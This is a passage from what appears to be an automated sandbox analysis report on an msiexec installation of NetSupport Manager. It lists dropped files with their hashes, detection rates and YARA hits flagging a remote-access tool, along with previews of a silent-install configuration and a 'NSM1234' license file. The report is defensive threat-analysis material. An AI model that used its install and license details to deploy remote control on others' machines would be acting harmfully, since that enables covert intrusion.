                                                                                      SSDEEP:3072:AZq8EqxQhS2QfOayU+cO30JHR8jZ4JmBPgyxOJoFiAyFUkplRAYeYjmeejj/:ZaxsmOTWujygwAyFUG1eleg/
                                                                                      MD5:EE02606C9E853533E2FF414E4640571B
                                                                                      SHA1:19C847251AADF8BA5A39CC090EEF8E6D7534C423
                                                                                      SHA-256:8545B1AF2255629A4EEA1B43E3D1794CDB9ED2E51B576F09E1C0C18023B7BCF3
                                                                                      SHA-512:984198538D4FD358E3910F2FA8D0BD6EE6D9488719B456D62D604B6B173F61B6201DFF94DE3722890A99CCADA30F95F009C433010381FB823FB2B16792EF157A
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\IcoViewer.dll, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):357
                                                                                      Entropy (8bit):5.476560262477391
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:JQDBPwQZBLIMZDoUT1MrRscL26GBMPGBTBLIMZDofTg/bVe6Q5WnfWZBLIMZDoKC:JePw09TDoUZe260M8T9TDofKVe/5Of2m
                                                                                      MD5:20850CE26369AFA16B77D360A50FBFB8
                                                                                      SHA1:A4D2C4A6DF9E252703BC35EBE91F8D82D7D4A7E0
                                                                                      SHA-256:78C5EF98BE61BAE0326E2AAF03494299D49CD9D7BBFAE8058D75A8D1E2882C62
                                                                                      SHA-512:14B59E9AF2DCA6B2D5C5A9AB13B799C7F5E48026BB9B1E6F5B028B66D632B380B34A5D78125BC3E02B6799FBF6275EE695E65F16FB54F042FEFA5FA5126F5841
                                                                                      Malicious:false
                                                                                      Preview:...KB5005260......CHotfixObject...KB5005260(https://support.microsoft.com/kb/5005260.....InventoryTime\UTCTime\0......CHardwareObject.1732326853.KB5013624.....KB5013624(https://support.microsoft.com/kb/5013624.....InventoryTime\Time\0...22 Nov 2024 20:54:13.KB4562830.....KB4562830(https://support.microsoft.com/kb/4562830.....ET\HotFixes...125.ET\Icons...0
                                                                                      Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                      File Type:data
                                                                                      Category:dropped
                                                                                      Size (bytes):4822
                                                                                      Entropy (8bit):5.703614080281652
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:Bkj45d7NKyBvVVLGngz8BkG3motc6kQJ8xxKkqvLzRYWtEE4Oe+JhoP7QLBRAPOR:q05qE9Vwg22vQmxELz5tf4Obhy0SqHl
                                                                                      MD5:80798C3301A79A06033108F2AE631892
                                                                                      SHA1:DAFC35CFB165ADC2D03DA3DC86520C1C9DE26A04
                                                                                      SHA-256:9193AF4BD1164B3F6F51922C773D28BEC8718A5A2018969E9AF32CC1D4D62277
                                                                                      SHA-512:8F3DD14BB7EA609192E4B46D3BBBC0B64A3E2B8BACB50BA270E96B8266B48DF03CD420C57CB20701EEEB39FDE2902524774CB717B6E2746739752BD8A77F1750
                                                                                      Malicious:false
                                                                                      Preview:...NetworkAdapter\IPSubnet\1......CHardwareObject.255.255.255.0.ComputerSystem\Name\0...494126.OperatingSystem\Version\0...10.0.19042.License\MaxClients\0...9999.DiskDrive\Size\0...488382.ET\Keyboard...125.ET\Enclosure...125.Printer\PortName\4...SHRFAX:.Printer\PortName\3...PORTPROMPT:.Printer\PortName\2...PORTPROMPT:.Printer\PortName\1...nul:.Printer\PortName\0...Microsoft.Office.OneNote_16001.14326.21452.0_x64__8wekyb3d8bbwe_microsoft.onenoteim_S-1-5-21-3425316567-2969588382-3778222414-1001.OperatingSystem\LoggedOnUser\0...user"OperatingSystem\Windows10Version\0...20H2.ET\PhysicalDrive...1125.SoundDevice\Name\1...Realtek High Definition Audio.SoundDevice\Name\0...Intel(R) Display Audio.ET\CPU...1109.NetworkAdapter\DHCPServer\1....NetworkAdapter\DHCPServer\0....LogicalDisk\Description\0....License\SerialNo\0...NSM1234.License\Licensee\0...NSM1234.ET\OS...1172.ET\Memory...125!NetworkAdapter\DefaultIPGateway\0...#DesktopMonitor\CurrentRefreshRate\0...59 LogicalDisk\VolumeSerialNumber\
                                                                                      Process:C:\Program Files (x86)\NetSupport\NetSupport Manager\client32.exe
                                                                                      File Type:data
                                                                                      Category:modified
                                                                                      Size (bytes):1579585
                                                                                      Entropy (8bit):2.819314143773699
                                                                                      Encrypted:false
                                                                                      SSDEEP:3072:+Ki0l+fHXWm9rgaez0Tv5oLVpX+S6k58nwSs8UaxW9FP8I7uRl96tV:viDTv5EiwSs8nW9F0yuRl9k
                                                                                      MD5:6C11C313587D3E0FDC4C83E7A57C617A
                                                                                      SHA1:BF8916537BD3E0FBBEFDFBB905072E7CD30025FC
                                                                                      SHA-256:B97C2C11A1859DB1661403EDC70F75D1C34244D48BE12F421B9CB1AA54508B19
                                                                                      SHA-512:32612E1B3B305BCD35A258D09DBB2F1EA8196343588E285BB817798C23AEAC04ED4BA81A7ED55424CD84184AC8FDACE93A09325BB8C8BAB4ECF56CCFB433BDD7
                                                                                      Malicious:false
                                                                                      Preview:u..OneNote for Windows 10/0/0......CSoftwareObject.16001.14326.21452.0.OneNote for Windows 10.Microsoft Corporation.OneNote for Windows 10jC:\Program Files\WindowsApps\Microsoft.Office.OneNote_16001.14326.21452.0_x64__8wekyb3d8bbwe\onenoteim.exe
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 1 x 20
                                                                                      Category:dropped
                                                                                      Size (bytes):831
                                                                                      Entropy (8bit):0.983335608654777
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:CBI/xi8M9C1Awcr02mxhl/E0ltrllwklE:wMc9CKwa0Rl/1lqklE
                                                                                      MD5:A2D88CFF615C867DD12ED7F2A0F4B307
                                                                                      SHA1:0BF04BDF015CF392AC7322200287482CA5BB4DE1
                                                                                      SHA-256:470801C93670F95D15D29D962E7903650F42B55EFF38DEBEDF76AF66E55D18F3
                                                                                      SHA-512:653B07F4D80D90E9730F6B1E405BEE77843A9FE2F9812B98642599CD441ACA3296FD2B6C8A25EBD68D4F981694E4AFDA6A4E7596091ED92496BFBA451E2CFA7A
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 10 x 20
                                                                                      Category:dropped
                                                                                      Size (bytes):847
                                                                                      Entropy (8bit):1.3936912447177485
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:CiIF3VdYF2tvfnug2A+HJaR85r02mxhl/E0ltrllIWzv12b/bVfe:zw4yGg2p0Rl/1lmy19
                                                                                      MD5:55E6FD2D853C73F3521420BF2A969DA7
                                                                                      SHA1:A45054111BF65155C586843B4CD40EA74E54C105
                                                                                      SHA-256:9513298F36610F67CF7D68559A2511B4CA35F93B84A648809C3EE381E2A3FCEA
                                                                                      SHA-512:C8B8BE6579566ADEB4096FC82057064E17DD3815059148D617C5B83A80B174A7C7849DF4ECCAA0C345B3193B9EDF5AFE7D9E748E8864C5FE142FEBA989BD4566
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 256 x 256
                                                                                      Category:dropped
                                                                                      Size (bytes):3600
                                                                                      Entropy (8bit):7.868516763778815
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:h+b+Hb7fTL37CCWf71dHoBbNVBqEjXOTbrPw6ASzi8y04dBrNNHbahN:h3f33uVf/HoBpVoErOvU6ry0ATN7AN
                                                                                      MD5:93997B1706AD63178B10429687E9B567
                                                                                      SHA1:A2D56AA4BDF21995E5B298E3B12DD76681617292
                                                                                      SHA-256:55C31D2A6EB40EB606AB3C0E65F98CC010AE9B8803E4553D8DB273944C8C0423
                                                                                      SHA-512:BCC3BD3D94FB50034EEC3D74C1F3AF1524CA485C4373DF7945A1CF259D03854F4EBE953D7BB70F4FB77A0924183853E4EEF807DC265172B06A32A680AF63A302
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 16 x 16
                                                                                      Category:dropped
                                                                                      Size (bytes):938
                                                                                      Entropy (8bit):2.8573986253171575
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:NzpsyX87KPbQBfO2/6jpywkVtiAoKgHQHt1Z39rvpmE:bev16VcH9gwNbhpmE
                                                                                      MD5:B373B4BDEE4E220D7515FBB293FB7224
                                                                                      SHA1:0C316664C0151093ED2A76C4C6285BA0835DDE74
                                                                                      SHA-256:59F6F5B3C98AFE90D4916C626D6459984AF3649B9F63F7BCE0925EAA49FBB1C2
                                                                                      SHA-512:CAAB966B209B9CD0D8818F9F91A99D3D2574EBD8F795B6E06EDA08AF3F2662DAB0DC319DC62656FE098557244037D148BE6C56FF1A88D08358BE90DC19744C15
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 14 x 13
                                                                                      Category:dropped
                                                                                      Size (bytes):891
                                                                                      Entropy (8bit):1.8494573303221005
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:mu8sPdPXrJ+l3Ozvn/lvW88B1lWqv/L9lUo/E:71/r4qFvWzd9E
                                                                                      MD5:220F33361D1D587C5899444C7B6C57CF
                                                                                      SHA1:53E9498570FA8DFFE491F4854104254EE395F9E7
                                                                                      SHA-256:163082A6F3992DC25B4B8848D2DB66A9E27CE7E6535B5F277DF119506CD1E4EA
                                                                                      SHA-512:FA336DB5835DA1FB5D943CBC40EEB8890B07BB14E5A2BB330F606500168C53661AC942C9148C1AB7EA6E656804D5E9F9C6832A4117DD1BFC165EEF502554D092
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 14 x 13
                                                                                      Category:dropped
                                                                                      Size (bytes):827
                                                                                      Entropy (8bit):1.2654828024465707
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:CABkulKFUFPtb9h4H9ee0XLylEJ+llt9YRka2b/rG:mu8sPdPXrJ+l3iRkaJ
                                                                                      MD5:6D7B88F8F540000104F86637B7A31E5B
                                                                                      SHA1:BB4D3765DA73CAF1B7CC2843EAE1106B3E67963F
                                                                                      SHA-256:104D7AD8EAFF36E019A84C3B18D1B37591D06D9C9841FF5B82310A800556EEC9
                                                                                      SHA-512:FBFA45CD58F55C0E745539014FCE0DDCDD913DA38F1AE5BAD7C2147FEF64E1DD585BB6411EC981D08AAA147B64BB6A93D2287A20719946CEBF4CDBB36695B269
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 14 x 13
                                                                                      Category:dropped
                                                                                      Size (bytes):891
                                                                                      Entropy (8bit):1.8451090876153475
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:CABkulKFUFPtb9h4H9ee0XLylEJ+llt9AzVFkmipnBIsRvssqy89sR1lfcTFEn:mu8sPdPXrJ+l3Ozvk2Ass0eR12K
                                                                                      MD5:78D2B10A120613047C691C679F165799
                                                                                      SHA1:6D3998780D06860C1589DFB2C0E826EFD86E05F3
                                                                                      SHA-256:CDA873D713E82B0E32020B393B3166A7E2E05DCEB7F8D269B4C64771888446BF
                                                                                      SHA-512:47EA9D750F7A5B1E22D92A35D870256BFC8045FCFC7D2B87E0E089820A6BBD71FF81F15F4877DDF3DD32C047747DD34DA47698441CAC82E62873876001378B9E
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 14 x 13
                                                                                      Category:dropped
                                                                                      Size (bytes):827
                                                                                      Entropy (8bit):1.2654828024465707
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:CABkulKFUFPtb9h4H9ee0XLylEJ+llt9YRka2b/rG:mu8sPdPXrJ+l3iRkaJ
                                                                                      MD5:6D7B88F8F540000104F86637B7A31E5B
                                                                                      SHA1:BB4D3765DA73CAF1B7CC2843EAE1106B3E67963F
                                                                                      SHA-256:104D7AD8EAFF36E019A84C3B18D1B37591D06D9C9841FF5B82310A800556EEC9
                                                                                      SHA-512:FBFA45CD58F55C0E745539014FCE0DDCDD913DA38F1AE5BAD7C2147FEF64E1DD585BB6411EC981D08AAA147B64BB6A93D2287A20719946CEBF4CDBB36695B269
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 256 x 256
                                                                                      Category:dropped
                                                                                      Size (bytes):2574
                                                                                      Entropy (8bit):7.7150160845623175
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:bq5K+FBR57fTL377fTClBHG+6OnPMddPp6pZRIqSCrOV8snZAOgadLO+:bqLFFf33PfuPi8uvCrOGsGN4Ld
                                                                                      MD5:AA5557A8EA8F8AF1B223501E4CB02E4D
                                                                                      SHA1:39E7292B18779468700245B526364B06C8AF09C9
                                                                                      SHA-256:E1427F55EDB661FF70EB297F887410F73109BB6CF25592E0AC548C5F4D1B7AD8
                                                                                      SHA-512:24CF5B8525065AF3F07F8A82ED189383E7AFD7D9F2F8E74C3B45CC4ED504ECD751FFE5DE15C28A2715172DAC38AF4D5B1E3E41E55CFE20019C830AB2CB3A69DA
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 128 x 128
                                                                                      Category:dropped
                                                                                      Size (bytes):6416
                                                                                      Entropy (8bit):7.672789387563995
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:dof5Gc5nRjOhtX21I1cv8jecTgaTobE0Gqe+3DWcgEB5qD5nXLuIi4UvUCF8UyIt:c5/RKX2vvQW9G4DFgEjWUBZLMA
                                                                                      MD5:9C66D6A559E99539BE51D8B506937B03
                                                                                      SHA1:8B6CFBFD26E68832DBF190BCBA6ABAD7696D5B54
                                                                                      SHA-256:EC9C5DD2A41455755758BE16EE3B0FBC1173EE953F1B49D820FD68AC5B7FA9CC
                                                                                      SHA-512:769D72D56A0F2B580391440CF1E1808523D2286E9659005A7D4120C655EB504BD773F6DC223A3A9782D1B82779BA901AFEADF59701D5C8EAC61EFB89B51F07C7
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 256 x 256
                                                                                      Category:dropped
                                                                                      Size (bytes):6520
                                                                                      Entropy (8bit):7.841992508206522
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:LjnnfoGCriNQaG34T46tblxNC53jX3gp6JE:/nfok3Uo46tp653b3G6JE
                                                                                      MD5:F9F426CA807A7EEE268EEDAD685998A7
                                                                                      SHA1:777892BBA52A7914F5AC030A215FE536F1D850FF
                                                                                      SHA-256:DCEAC6EB086C02875C1F2A6221750A6B9E7C10E42D498106F4AE72AABE639321
                                                                                      SHA-512:C129EAB92CEDEF05FA1A772F0C8C93E5EDB01BCEF77A844F22EE648FDC79EE631A0687DC837FD07A8B75364339C0F38DE1DCA3DFBD1FD4E7E8382C5E473B6B0C
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 1 x 20
                                                                                      Category:dropped
                                                                                      Size (bytes):831
                                                                                      Entropy (8bit):0.972559746338926
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:CBI/VXVm/XFkMr02mxhl/E0ltrllQ6E:woXVm/B0Rl/1l1E
                                                                                      MD5:BA6A6D3669870D2DB7EDC67BBF3FF236
                                                                                      SHA1:3B3D0AB6731C4A146DD10BED4D06FC260657F059
                                                                                      SHA-256:A59009593867C1E9F6866A0BBD1E81B9D525A1844D0E2E8FC89DC92411DB00FA
                                                                                      SHA-512:A76BC5E20A7C71C64F398503BC34BE777115593DA56089D29F09FB1F5BA8A7FB22B5E190BBD56237DABC1F02838F3A5E7D322162C3A4800D255B541FE4CF5867
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 108 x 85
                                                                                      Category:dropped
                                                                                      Size (bytes):7876
                                                                                      Entropy (8bit):7.513291372804623
                                                                                      Encrypted:false
                                                                                      SSDEEP:192:lY8I2A27bUw0r7Ro7cFjYLNT0vvqFZsI+8YrYn1XsjJmIXb:y8SobXORac+T0GZst8YrYn18ZL
                                                                                      MD5:1778BE96CF115F3207F976CC1064612B
                                                                                      SHA1:CFAC3B903F0E11E3263582EB3B1BFB4E6432CDE7
                                                                                      SHA-256:204A91AF35DD6F6CBAA6FC84D4AF48F78D3A56945526DEC0A27B4BCA6C1C4738
                                                                                      SHA-512:659AD463254D3522941744500670C527280A5173B25487BED82413885A9C67B2EB79C95897D256DA73D2C9D93D8FE7AD53DBF412D1E7BFAC7C223DEB37291A8D
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 256 x 256
                                                                                      Category:dropped
                                                                                      Size (bytes):4283
                                                                                      Entropy (8bit):7.821192064882651
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:WpJqWEsMxTm3h0CXoxYCPLMh3ACSf8IMCldhzGs:WpJyT8mAsdzG3Apf1MCvV
                                                                                      MD5:EC30AA4154A544FC9426051D0B91F90B
                                                                                      SHA1:0CCE9BBBCC46D51040B2102561FF9E59FC8390E9
                                                                                      SHA-256:1D2C086DBB986B6D7246864EBD9F8D265E7ABA98F79AE6E52A53C86F46EFC85F
                                                                                      SHA-512:4170304640A652F55C58787C4AAF0A18D6EC7C782A419EF0C0A11F2958FE950B3707D454FF92E0AEF85E7E279DAB5319E26285BA5D8D372FA400C83C7691398F
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 256 x 256
                                                                                      Category:dropped
                                                                                      Size (bytes):2951
                                                                                      Entropy (8bit):7.881907377142764
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:j6pdPL2M8R95nbi6j7BCqR7eUP0Pg9DDe1EgOl6UXU7M1SIFI11sSaA4Ve:judT2Rs6j7hyUPNeK56UrjA40
                                                                                      MD5:DD3B10ADD893198C9159F2A4D0E7C534
                                                                                      SHA1:A3E1B3092E8BD0C89BF237D15104A2348C7AAC3C
                                                                                      SHA-256:588B76D2B41138AB4BC6EA53F6D7742A771488346F2AF1A854836524816F1126
                                                                                      SHA-512:B610D3290982FC6ADEF21A4053DA7C09EFAB2337BB8B68856DB58293AD509BCE89B93CFD2229CE9BCD6FFC0D4B14B0FCFBF9AD989583A2CC4AE02558D1250E3F
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 256 x 256
                                                                                      Category:dropped
                                                                                      Size (bytes):2035
                                                                                      Entropy (8bit):7.88230344011226
                                                                                      Encrypted:false
                                                                                      SSDEEP:48:FSo5FF/7f5vb7vgIsYIeUqVnV5sJDZaQnn9t5o7q8qr/W:8o5FNflb7gIPUqz5sJLn9t5V8qzW
                                                                                      MD5:9B1957B4A51144937F248740C26D24B8
                                                                                      SHA1:B06D1590071110A36E6A94B516E46818F73A797D
                                                                                      SHA-256:E2B717CA84391B8D2158E8029F1C24920180CC9FFB88616520B0E05CE521E528
                                                                                      SHA-512:A048AE98A57870AB67FC954F4E49DBA2534573DB3362BF2C28006FBA40B92526769DFC086BBBD1427BBAF1EB4629D19B5ECA2D87A088E8BCEE19DC8E1931B600
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 1 x 20
                                                                                      Category:dropped
                                                                                      Size (bytes):831
                                                                                      Entropy (8bit):0.9654320700764645
                                                                                      Encrypted:false
                                                                                      SSDEEP:3:CBI/nExibw5laBr02mxhl/E0ltrllUklE:waERi0Rl/1lGklE
                                                                                      MD5:67B2128FB5228203D3CA1E746BF9C15D
                                                                                      SHA1:084C644983B44ABE7527E6B38390C0000C3F11CC
                                                                                      SHA-256:BE1B29D4F7699CD988FA1E6AB5255735BC4A53C02CD64ACF1BE345EE4EA5F800
                                                                                      SHA-512:137271AF0E21605E5F59F0786F0B22456EB660B2D8425364B2F036693546D56941CDF958B50DEAB04798C36AA27FBBF41ECBC6828CD5A796AF0605F23C457F4B
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 16 x 16
                                                                                      Category:dropped
                                                                                      Size (bytes):952
                                                                                      Entropy (8bit):3.3227002761893862
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:PacUfx/L7/elDHgVHhV9In1gFyEDZjJO73T9+K2ki:vw2lD8HX9In6y+Pa3R+97
                                                                                      MD5:0D0A3F569BE68B6046C02F739DDDAD52
                                                                                      SHA1:9C7A14C4DD671B4BDFC9EEFFE8478EF1A3E0C3BA
                                                                                      SHA-256:F4929A6F524DC3BD502C263C08E4F3DF238BE21512759E7C85B3C31A44C49CA8
                                                                                      SHA-512:CF45F36444BBE731674B19B5090008C3AAE968037CB516989455C1576FBA54AF5CCCED42CB28251383401CD55822A42EBF8A8A71DE3E6B9B8576501AA4A37286
                                                                                      Malicious:true
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 32 x 32
                                                                                      Category:dropped
                                                                                      Size (bytes):958
                                                                                      Entropy (8bit):3.837476529387128
                                                                                      Encrypted:false
                                                                                      SSDEEP:12:3/ZIjXg3LZKOU5pImNVVN6UxKF8uT00NLkE:32jgMx5Kmrr6Ux1izL/
                                                                                      MD5:715C4A7A4ECB3C17856F3486067583B3
                                                                                      SHA1:860F26ED5F34D290EECFF0CFA7AD8DD8A0FE8318
                                                                                      SHA-256:E0DED6BD0DFA994E59786BC83CB62493F511B07F93CDE4305E88A3B1A8986862
                                                                                      SHA-512:ECD7A73F48F36F1F273DCF07DD1B294C43DAE974BD5BCFED60C8761CC1802176E3D4C00395454C824262E580E343C12C9866EBE4E0ED4DA6DF264B3817FBEC47
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:GIF image data, version 89a, 256 x 256
                                                                                      Category:dropped
                                                                                      Size (bytes):1163
                                                                                      Entropy (8bit):7.788256448215719
                                                                                      Encrypted:false
                                                                                      SSDEEP:24:Gek36A873hchk6lo7Cl1sx6LJXLs9eIavsAD3v3KF8lqeKmX:tkqA8DhUloS3VjIaz3v3oR2
                                                                                      MD5:1DE02006ADA71EEEEF52BDE607411092
                                                                                      SHA1:26224EAD28E087B0CB5AAD3A5CD584598407BA14
                                                                                      SHA-256:241E11F78B196CB96B742E901AC4B07014D9BE89C38FC51C26993E00EFA42464
                                                                                      SHA-512:3B37E775D6DE4C615B137D7F7DE75176B7AC9946BCFDF6FDB04D9A8F570D97EF6E564B4990D9390F8FBFFE7677730A0E786EF5CBBBCC2D10749FAF4736F1CACB
                                                                                      Malicious:false
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):58336
                                                                                      Entropy (8bit):6.882094538107883
                                                                                      Encrypted:false
                                                                                      SSDEEP:768:0sOCkVP/zMhlawzEDmAnomANKl49r2pe/TeHDHf/ckpvr2pe/DkqHDHf/cklON:0htcW+KlUee/SjHdjee/hjHhK
                                                                                      MD5:E06343CDA474C451258894E1AF0EA7B0
                                                                                      SHA1:9A02F031A278A3245272ECE1004D0BDD1F40F58D
                                                                                      SHA-256:83222B71D197592C717835F9DAEE81266BE6F47B67B0ED5C84CAEF25877E876B
                                                                                      SHA-512:824185904B08A17D8D2F139376F8BD0C622EF9D461881E117809CB14E043BD77E4A730A6C0E8F1A791DFF355214EB7B5D6F89B19E3271017547A63D7BCC9F731
                                                                                      Malicious:false
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):2419680
                                                                                      Entropy (8bit):4.698078733564096
                                                                                      Encrypted:false
                                                                                      SSDEEP:12288:OlRqzaIVAjheUC4PHYsDyl5+xAx8rSI/HhkSkJ2v7rz82ahdMbAK+p8q6JfXHWZO:4c1xUh85oY05Hhlmj9aZ
                                                                                      MD5:15ACD82C7402BC89F61F2A5E2B0C90EB
                                                                                      SHA1:068D37149E372F01EFEBC40B42BFD873AB9BCFF2
                                                                                      SHA-256:2B9673D6AB08AC2204D50A327D838047A6C64ACDAD765B887B3349D70C9CD307
                                                                                      SHA-512:287A0C23C97E1D557268160F40B6CAC533BFCF7515362C608D57D3DB797AF3499DC0276E775661005A2C8A64462579F8510DE9073FD245CC569516D6F15D0CB4
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClient32UI.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):232416
                                                                                      Entropy (8bit):6.6458885862654755
                                                                                      Encrypted:false
                                                                                      SSDEEP:6144:l60wP+d9JCHANFegxoTRy212Te/giriLeIezEB:l6dE9MH8FegGTU20T8zxzQ
                                                                                      MD5:9B60C6DDFD1C4BC22007578132FDEE99
                                                                                      SHA1:462DE03AC21EBBAAB8C9A325C7DA8F82B50C6B0B
                                                                                      SHA-256:5ECC47AFFF0FC16009B369A9B5BB969F5DD36D47207BF2A6CF433903E74C216B
                                                                                      SHA-512:F106918649B42EEDB4262C0699FAF465296331990691C99BC16990BC66AB2E3FB6CEEB3FAAF978DE4A4329954BF37D9AB79CC368A08CD38035F4750CBF169217
                                                                                      Malicious:false
                                                                                      Yara Hits:
                                                                                      • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Program Files (x86)\NetSupport\NetSupport Manager\NSClientTB.exe, Author: Joe Security
                                                                                      Antivirus:
                                                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                      Category:dropped
                                                                                      Size (bytes):253
                                                                                      Entropy (8bit):5.069358624511852
                                                                                      Encrypted:false
                                                                                      SSDEEP:6:Iyovk4xRPjwxVza1DKHMoEEjLgpW2MQDHZYpPM/io6K6a8l6i7s:IFR7wx9vJjjqW2M5PM/iovH8l6J
                                                                                      MD5:D2C2217861F5535686409D80A0867F6F
                                                                                      SHA1:F4D90BEBFCF8F501E5B9F0427028F696C3A191C7
                                                                                      SHA-256:AF9C79CF3AF6A7E969208DA78DFCFAC54D6F956545B46F434D0E447CFF94807B
                                                                                      SHA-512:656DEAC03F9D81792E3D78108FB7D6754CA4A21A30F0E8DA72E71F64B0B015DFC299D5478A8CC27ACB05A0EC7E01C2C1CFCC9EB40041E4FE0A790414E42B4A37
                                                                                      Malicious:false
                                                                                      Preview:1400..0x98f177db....; NetSupport License File...; Generated on 02:59 - 15/09/2022........[[Enforce]]....[_License]..control_only=0..expiry=..inactive=0..licensee=NSM1234..maxslaves=9999..os2=1..product=10..serial_no=NSM1234..shrink_wrap=0..transport=0..
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:Generic INItialization configuration [Features]
                                                                                      Category:dropped
                                                                                      Size (bytes):6458
                                                                                      Entropy (8bit):4.645519507940197
                                                                                      Encrypted:false
                                                                                      SSDEEP:96:B6pfGAtXOdwpEKyhuSY92fihuUhENXh8o3IFhucOi49VLO9kNVnkOeafhuK7cwo4:BnwpwYFuy6/njroYbe3j1vlS
                                                                                      MD5:88B1DAB8F4FD1AE879685995C90BD902
                                                                                      SHA1:3D23FB4036DC17FA4BEE27E3E2A56FF49BEED59D
                                                                                      SHA-256:60FE386112AD51F40A1EE9E1B15ECA802CED174D7055341C491DEE06780B3F92
                                                                                      SHA-512:4EA2C20991189FE1D6D5C700603C038406303CCA594577DDCBC16AB9A7915CB4D4AA9E53093747DB164F068A7BA0F568424BC8CB7682F1A3FB17E4C9EC01F047
                                                                                      Malicious:false
                                                                                      Preview:..[General]..ClientParams=..CLIENT32=..Installdir=..NOARP=..SuppressAudio=......[Features]..Client=1..Configurator=..Control=..Gateway=..PINServer=..RemoteDeploy=..Scripting=..Student=..TechConsole=..Tutor=......[StartMenuIcons]..ClientIcon=..ConfigIcon=..ControlIcon=..RemoteDeployIcon=..ScriptingIcon=..TechConsoleIcon=..TutorIcon=......[DesktopIcons]..ControlDeskIcon=..TechConsoleDeskIcon=..TutorDeskIcon=............; This NSM.ini file can be used to customise the component selections when performing a silent installation of the product.....; Client=<1/Blank>..; e.g...; Client=1..; Controls whether the client component is installed (1) on the target machine or not (Blank)..;....; CLIENT32=<blank/not blank>..; e.g...;. CLIENT32=..;. Setting this to anything causes the Client Service (if installed) to be set to manual start rather than automatic..;....; ClientIcon=<1/Blank>..; e.g...; ClientIcon=1..; Controls whether shortcut icons are placed on t
                                                                                      Process:C:\Windows\System32\msiexec.exe
                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                      Category:dropped
                                                                                      Size (bytes):115168
                                                                                      Entropy (8bit):6.225008841780487
                                                                                      Encrypted:false
